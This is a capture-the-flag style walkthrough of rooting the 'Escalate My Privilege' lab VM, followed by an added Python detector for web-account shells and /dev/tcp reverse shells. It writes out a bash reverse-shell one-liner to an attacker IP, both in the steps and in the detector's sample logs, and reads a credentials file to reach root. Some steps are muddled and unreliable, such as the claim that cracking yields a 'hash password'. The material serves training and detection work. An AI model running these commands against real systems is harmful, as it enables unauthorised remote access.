Escalate My Privilege

Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.

Ans: First, open Escalate_my_privilage in the VM. We can see the IP address of 192.168.1.13.

Ans: Run nmap -sV 192.168.1.13 against the Escalate_my_privilage VM to see how many ports are open.

Ans: Connect to your Escalate_my_privilage IP address 192.168.1.13.

Ans: Go to Inspect Element; there we can find phpbash.php to open.

Ans: Run (ls) to view the version files list.

Ans: Start a server on Kali (sudo python3 -m http.server 80) for your Escalate_my_privilage VM. Make a shell.php file to connect from 192.168.1.13.

Ans: With whoami I found (apache), with id uid=48, and with ls -la I found total 44 files.

Ans: I am in /var/www/html; cat robots.txt shows user-agent: *

Ans: Inside the home directory, I found the armour folder, and when I went through it and checked the files, I found some files, among them a file named credentials.txt. I found the root password: md5 (rootroot1).

Ans: After cracking the string rootroot1 using md5, we got a hash password.

Reverse Shell

Shell shoveling, in network security, refers to the act of redirecting the input and output of a shell to a service so that it can be remotely accessed. In computing, the most basic method of interfacing with the operating system is the shell.

Ans: Connect from the web shell to the Kali device (bash -c 'exec bash -i &>/dev/tcp/192.168.1.14/4949 <&1').

Ans: I have found id, apache.

Ans: Run the command su armour; the password is the hash password which we had cracked before.

Ans: import python3. After getting python 3 we got root privilege.

Ans: Get root user.
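
A defender-side view of the reverse shell step above, as an added example that is not part of the original write-up: it scans process-execution records for the web-server account (uid=48, apache, as seen earlier) spawning a shell, and for any shell using /dev/tcp redirection. The key=value log format, the parent-process names and the sample records are constructed for illustration.

```python
import re

# Constructed records in a hypothetical key=value format (not real auditd output).
SAMPLE_LOG = """\
ts=1700000001 uid=48 parent=httpd cmd="bash -c 'exec bash -i &>/dev/tcp/192.168.1.14/4949 <&1'"
ts=1700000002 uid=48 parent=httpd cmd="/usr/sbin/httpd -DFOREGROUND"
ts=1700000003 uid=1000 parent=sshd cmd="bash -i"
ts=1700000004 uid=0 parent=crond cmd="bash -c 'echo ok >/dev/tcp/10.0.0.5/514'"
ts=1700000005 uid=48 parent=httpd cmd="sh -c id"
"""

WEB_UIDS = {48}                                # apache's uid in the walkthrough
WEB_PARENTS = {"httpd", "apache2", "php-fpm"}  # assumed web worker process names
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
SHELL = re.compile(r"(?:^|[\s/])(?:ba|da|z|k)?sh(?=\s|$)")
INTERACTIVE = re.compile(r"\b(?:ba)?sh\s+-i\b")
DEV_NET = re.compile(r"/dev/(?:tcp|udp)/([^/\s'\"]+)/(\d+)")

def parse(line):  # one key=value record -> dict with an integer uid
    rec = {k: v.strip('"') for k, v in FIELD.findall(line)}
    return {**rec, "uid": int(rec.get("uid", -1))}

def classify(rec):
    """Return a finding dict for a suspicious record, or None."""
    cmd = rec.get("cmd", "")
    from_web = rec["uid"] in WEB_UIDS or rec.get("parent") in WEB_PARENTS
    net = DEV_NET.search(cmd)
    reasons = []
    if net:
        reasons.append("dev-net-redirect")      # bash socket pseudo-device
    if INTERACTIVE.search(cmd):
        reasons.append("interactive-shell")
    if from_web and SHELL.search(cmd):
        reasons.append("web-account-shell")     # web worker spawned a shell
    if net:
        severity = "high" if from_web else "medium"
    elif "web-account-shell" in reasons:
        severity = "medium" if "interactive-shell" in reasons else "low"
    else:
        return None                             # e.g. an admin's own bash -i
    dest = f"{net.group(1)}:{net.group(2)}" if net else None
    return {"ts": rec["ts"], "severity": severity, "reasons": reasons, "dest": dest}

def detect(log_text):  # classify every non-empty line, keep only the findings
    hits = (classify(parse(l)) for l in log_text.splitlines() if l.strip())
    return [h for h in hits if h]

if __name__ == "__main__":
    print(*detect(SAMPLE_LOG), sep="\n")
```

The low-severity rule (any shell spawned under the web account) also covers commands typed into a browser-based shell such as phpbash.php, at the cost of more noise on servers whose applications legitimately shell out.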
